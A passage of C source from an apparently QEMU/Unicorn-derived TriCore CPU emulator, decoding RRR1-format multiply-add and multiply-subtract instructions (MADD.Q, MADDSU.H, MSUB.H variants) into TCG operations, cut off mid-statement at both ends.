OPC2_32_RRR1_MADDR_H_LU: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDR_H_UL: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDR_H_UU: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDRS_H_LL: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDRS_H_LU: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDRS_H_UL: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDRS_H_UU: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr1_maddq_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; TCGv temp, temp2; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); temp = tcg_const_i32(tcg_ctx, n); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRR1_MADD_Q_32: gen_madd32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MADD_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MADD_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madd32_q(ctx, tcg_ctx->cpu_gpr_d[r4], 
tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADD_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madd64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADD_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madd32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADD_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madd64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADD_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16add32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADD_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16add64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADD_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16add32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADD_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16add64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_32: gen_madds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MADDS_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MADDS_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADDS_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADDS_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADDS_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADDS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); 
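/* MADDS.Q 32 LL: multiply the sign-extended low halfwords prepared above (16x16 -> 32, Q-format) and accumulate with saturation. */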
gen_m16adds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16adds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16adds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16adds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADDR_H_64_UL: CHECK_REG_PAIR(r3); gen_maddr64_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MADDRS_H_64_UL: CHECK_REG_PAIR(r3); gen_maddr64s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MADDR_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_maddr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDR_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_maddr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDRS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_maddrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDRS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_maddrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void decode_rrr1_maddsu_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MADDSU_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSU_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSU_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], 
tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSU_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUS_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUS_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUS_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUS_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUM_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUM_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUM_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUM_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUMS_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUMS_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUMS_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUMS_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case 
OPC2_32_RRR1_MADDSUR_H_16_LL: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUR_H_16_LU: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUR_H_16_UL: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUR_H_16_UU: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSURS_H_16_LL: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSURS_H_16_LU: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSURS_H_16_UL: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSURS_H_16_UU: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr1_msub(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MSUB_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUB_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUB_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUB_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 
MODE_UL); break; case OPC2_32_RRR1_MSUBS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBM_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBM_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBM_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBM_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBMS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBMS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBMS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBMS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case 